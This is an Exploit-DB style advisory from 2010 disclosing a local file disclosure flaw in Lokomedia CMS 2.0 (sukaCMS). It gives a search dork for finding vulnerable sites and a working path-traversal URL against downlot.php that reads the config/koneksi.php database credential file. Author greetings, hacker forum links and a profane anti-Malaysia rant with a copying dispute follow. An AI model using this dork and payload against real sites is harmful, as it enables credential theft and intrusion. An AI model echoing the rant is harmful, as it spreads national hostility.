Lokomedia CMS - 'sukaCMS' Local File Disclosure

EDB-ID:

12651


Author:

vir0e5

Type:

webapps


Platform:

PHP

Date:

2010-05-18


# Software Link: http://bukulokomedia.com
# Version: [2.0]
# Tested on: [all OS]

[+] Title : Local File Disclosure Vulnerability Lokomedia CMS (sukaCMS)

[+] Vendor     : http://bukulokomedia.com

[+] Discovered : vir0e5 a.k.a banditc0de

[+] Contact    : vir0e5[at]hackermail[dot]com

[+] Site       : http://vir0e5.blogspot.com

[+] DorK       : inurl:/downlot.php?file=
 
[+] Exploit    : http://[host]/[dir]/downlot.php?file=../config/koneksi.php

[+] Greetings  :[ mywisdom - kiddies - kamtiez - r3m1ck - Aoc - skuteng_boy  - blue_screen - 
                  agdi_cool - dangercode14045 - dewancc and YOU!!!! ] ;

[+] Forum [as member] : http://indonesian-cyber.org | http://tecon-crew.org | http://u3dcrew.darkbb.com | http://devilzc0de.org

[+] Notice : "boycott malaysian product "
* Fuck to Malaysia <= the truly thief asia  
* For HaMaDa SCoOoRPioN are you layz????? copy my exploit???
  http://securityreason.com/securityalert/7161  
  http://securityreason.com/exploitalert/7413   Look Date!!! your copy my style!!!